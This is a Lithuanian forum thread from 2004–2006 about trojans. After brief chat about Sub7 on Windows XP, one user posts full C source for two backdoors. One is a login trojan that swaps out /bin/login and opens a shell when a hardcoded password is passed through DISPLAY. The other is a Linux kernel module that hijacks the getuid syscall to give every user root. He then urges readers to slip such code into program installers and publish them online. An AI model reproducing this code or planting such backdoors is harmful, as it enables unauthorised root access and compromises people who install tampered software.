[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(): Failed opening './includes/bbcode.php' for inclusion (include_path='.:/opt/alt/php74/usr/share/pear')
Straipsniai.lt •XP trojanai

Straipsniai.lt

Diskusijos įvairiomis temomis
https://diskusijos.straipsniai.lt/

XP trojanai

https://diskusijos.straipsniai.lt/viewtopic.php?f=116&t=6105

Puslapis 11

XP trojanai

Parašytas: 2004 04 22 20:07
Administratorius
XP trojanai

Parašytas: 2004 04 28 03:18
Marelis
Oi kaip as dievinu Trojanus turiu ju daug...

Parašytas: 2004 04 30 03:40
Zalias
Ir ka su jais darai?

Parašytas: 2005 04 08 21:24
HaveNoName
sub7 veikia ant xp ?

Parašytas: 2006 04 28 22:54
Xgreem
Taip....ant NT sistemu....ant *nix nepanaudosi.

Parašytas: 2006 06 12 20:11
GODhack
Skaityk cia http://lwn.net/1998/1119/Trojan.html ir apie *nix sitemas nustosi galvot kaip apie nenulauziamas.


Arba sitas:

Kodas: Pasirinkti visus

/*
 * PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
 *	Universal login trojan by Tragedy/Dor
 *		Email: rawpower@iname.com
 *		IRC: [Dor]@ircnet
 *
 *	Login trojan for pretty much any O/S...
 *	Tested on:   Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
 *		     OSF1/DGUX4.0, 
 *	Known not to work on:
 *		SunOS 4.x and 5.4... Seems the only variable passwd to login
 *		on these versions of SunOS is the $TERM... and its passed via
 *		commandline option... should be easy to work round in time
 *
 *   #define         PASSWORD  - Set your password here
 *   #define         _PATH_LOGIN - This is where you moved the original login to
 *  login to hacked host with...
 *  from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
 *
 */

#include        <stdio.h>
#if !defined(PASSWORD)
#define 	PASSWORD	"j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define                _PATH_LOGIN     "/bin/login"
#endif


main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
  if ( display == NULL ) {
        execve(_PATH_LOGIN, argv, envp);
        perror(_PATH_LOGIN);
        exit(1);
	}
  if (!strcmp(display,PASSWORD)) {
                system("/bin/sh");
        exit(1);
        }

        execve(_PATH_LOGIN, argv, envp);
        exit(1);
}


Arba root statusas visiem useriam:

Kodas: Pasirinkti visus

/*
 * A kernel trojan (basic linux kernel module)
 *
 * Description: gives all users root
 *
 * 	coded by fred_ | blasphemy
 *
 *  Compile:	gcc -c -O3 all-root.c
 *  Load:	insmod all-root.o
 *  Unload:	rmmod all-root
 *
 *	email: cornoil@netscape.net
 */

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <sys/mman.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>

extern void *sys_call_table[];

int (*orig_getuid)();

int give_root()
{
	int x;
	if (current->uid != 0) {
		current->uid = 0;
		current->gid = 0;
		current->euid = 0;
		current->egid = 0;
	  }
	return 0;
}

int init_module(void)
{
	orig_getuid = sys_call_table[SYS_getuid];
	sys_call_table[SYS_getuid] = give_root;

	return 0;
}

void cleanup_module(void)
{
	sys_call_table[SYS_getuid] = orig_getuid;
}
Tokius kodus tereik tik i kokios programos setupo sorsa imaisyt ir idet i intika. Retas kuris pries istaliuodamas programa i linux skaito kiekviena eilute, o automatizuotu skriptu nera.

Cia tik pora pavyzdziu, tokiu prirasyta iki siandien gal jau simtai.
Visos datos yra UTC+03:00
Puslapis 11
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/